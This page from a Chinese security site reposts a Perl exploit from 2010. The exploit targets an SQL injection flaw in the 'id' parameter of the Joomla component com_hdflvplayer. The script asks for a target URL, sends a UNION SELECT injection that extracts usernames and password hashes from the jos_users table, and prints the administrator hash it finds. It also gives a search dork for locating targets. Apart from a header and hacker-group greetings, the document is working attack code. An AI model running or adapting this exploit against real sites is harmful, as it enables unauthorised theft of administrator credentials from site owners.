首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Joomla Component com_hdflvplayer (id) SQL Injection Exploit
来源:http://www.indonesiancoder.com 作者:kaMtiEz 发布时间:2010-02-25  

#!/usr/bin/perl -w

###############################################################################################
#
# [~] Joomla Component com_hdflvplayer SQL injection exploit - (id)
# [~] Author : kaMtiEz (kamzcrew@yahoo.com)
# [~] Homepage : http://www.indonesiancoder.com
# [~] Date : 15 February, 2010
#
###############################################################################################
#
# [ Software Information ]
#
# [+] Vendor : http://www.hdflvplayer.net/
# [+] Price : $ 99.00
# [+] Vulnerability : SQL injection
# [+] Dork : inurl:"CIHUY"
# [+] Type : commercial
#
###############################################################################################
#
# USAGE : perl kaMz.pl
#
###############################################################################################

print "\t\t[!]=========================================================[!]\n\n";
print "\t\t               [~]  INDONESIANCODER TEAM  [~]                  \n\n";
print "\t\t[!]=========================================================[!]\n\n";
print "\t\t  [!]Joomla component com_hdflvplayer SQL injection exploit[!] \n\n";
print "\t\t                      [~] by kaMtiEz [~]                       \n\n";
print "\t\t[!]=========================================================[!]\n\n";
 
use LWP::UserAgent;
 
print "\nsite/path[!]http://www.indonesiancoder.com/kaMz/[!]:";
chomp(my $IBL13Z=<STDIN>);
 
$kaMtiEz="concat(username,0x3a,password)";
$tukulesto="jos_users";
$pathloader="com_hdflvplayer";

$r3m1ck = LWP::UserAgent->new() or die "Could not initialize browser\n";
$r3m1ck->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
 
$arianom = $IBL13Z . "/index.php?option=".$pathloader."&id=1+AND+1=2+UNION+SELECT+".$kaMtiEz.",1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+".$tukulesto."--";
$gonzhack = $r3m1ck->request(HTTP::Request->new(GET=>$arianom));
$contrex = $gonzhack->content; if ($contrex =~/([0-9a-fA-F]{32})/){
print "\n[+] CIHUY Admin Password Nya GAN [+]: $1\n\n";
}
else{print "\n[+] Exploit GAGAL GAN ![+]\n";
}

##############################################################################################
#
# GREETZZZZZ :
#
# INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah
# tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzhack
# Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah,ibl13z,r3m1ck
# Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk
#
##############################################################################################
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Safari 4 Remote Crash Vulnerab
·MediaCoder v0.7.3.4605 Local B
·Mozilla Firefox v3.6 URL Spoof
·iPhone WebCore::CSSSelector()
·Mozilla Firefox 3.6 (memory co
·iPhone FTP Server By Zhang Boy
·Tinypug v0.9.5 CSRF Password C
·Joomla Component com_joomlacon
·iPhone FtpDisc v1.0 Denial of
·Internet Explorer versions 6,
·iPhone - FTP Server (WiFi FTP)
·Orbital Viewer v1.04 (.orb) 0d
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved